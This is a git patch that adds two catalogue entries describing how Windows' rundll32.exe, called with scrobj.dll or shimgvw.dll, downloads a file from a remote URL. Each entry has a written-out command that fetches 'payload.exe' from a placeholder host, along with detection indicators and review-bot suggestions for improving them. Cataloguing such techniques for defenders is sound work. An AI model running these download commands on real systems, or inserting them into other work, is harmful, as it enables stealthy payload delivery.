From e4c2371a26fc6535d7a7be747be7f0e0eca401ee Mon Sep 17 00:00:00 2001
From: eral4m <92914012+eral4m@users.noreply.github.com>
Date: Sat, 5 Aug 2023 16:50:52 +0100
Subject: [PATCH] Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189)

Co-authored-by: Wietze
---
 yml/OSLibraries/Scrobj.yml | 23 +++++++++++++++++++++++
 yml/OSLibraries/Shimgvw.yml | 23 +++++++++++++++++++++++
 2 files changed, 46 insertions(+)
 create mode 100644 yml/OSLibraries/Scrobj.yml
 create mode 100644 yml/OSLibraries/Shimgvw.yml

diff --git a/yml/OSLibraries/Scrobj.yml b/yml/OSLibraries/Scrobj.yml
new file mode 100644
index 0000000..5a3ba5c
--- /dev/null
+++ b/yml/OSLibraries/Scrobj.yml
@@ -0,0 +1,23 @@
+---
+Name: Scrobj.dll
+Description: Windows Script Component Runtime
+Author: Eral4m
+Created: 2021-01-07
+Commands:
+ - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe
+ Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\\payload[1].exe.
+ Usecase: Download file from remote location.
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: c:\windows\system32\scrobj.dll
+ - Path: c:\windows\syswow64\scrobj.dll
+Detection:
+ - IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line
+Resources:
+ - Link: https://twitter.com/eral4m/status/1479106975967240209
+Acknowledgement:
+ - Person: Eral4m
+ Handle: '@eral4m'
diff --git a/yml/OSLibraries/Shimgvw.yml b/yml/OSLibraries/Shimgvw.yml
new file mode 100644
index 0000000..acf102f
--- /dev/null
+++ b/yml/OSLibraries/Shimgvw.yml
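Review bot: The Detection block for Scrobj.yml lists only the command-line IOC, while the Description on the line above it already establishes a second, host-based artifact: rundll32.exe writing the fetched file under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\. Adding that as a second entry, `- IOC: rundll32.exe creating a file under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\`, gives defenders a file-creation signal that survives command-line obfuscation. In the same Description the path is written as `IE\\payload[1].exe`; in an unquoted YAML scalar the backslash is not an escape, so this renders with a doubled backslash, and if it is meant to stand for an intermediate cache subdirectory an explicit placeholder such as `IE\<cache-dir>\payload[1].exe` is clearer. Shimgvw.yml has the same doubled backslash and the same single-IOC Detection block. Separately, the linked status ID appears to decode to early January 2022 rather than 2021, so `Created: 2021-01-07` may be a year typo worth confirming (same for the 2021-01-06 date in Shimgvw.yml).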
@@ -0,0 +1,23 @@
+---
+Name: Shimgvw.dll
+Description: Photo Gallery Viewer
+Author: Eral4m
+Created: 2021-01-06
+Commands:
+ - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
+ Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
+ Usecase: Download file from remote location.
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: c:\windows\system32\shimgvw.dll
+ - Path: c:\windows\syswow64\shimgvw.dll
+Detection:
+ - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line
+Resources:
+ - Link: https://twitter.com/eral4m/status/1479080793003671557
+Acknowledgement:
+ - Person: Eral4m
+ Handle: '@eral4m'
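Review bot: The Description in this hunk names a second usable entrypoint, 'ImageView_FullscreenA', but the Detection IOC names only 'ImageView_Fullscreen'; a substring match happens to cover both, yet an exact-token rule written from this IOC would miss the A variant. Stating both explicitly, `- IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' or 'ImageView_FullscreenA' and a protocol handler ('://') on the command line`, removes that ambiguity for rule authors. Minor consistency point: the Command here writes the drive as `c:\Windows` while the sibling Scrobj.yml entry in this commit uses `C:\Windows`, and the Full_Path entries below use all-lowercase paths in both files; one casing convention across the repository keeps exact-match tooling predictable.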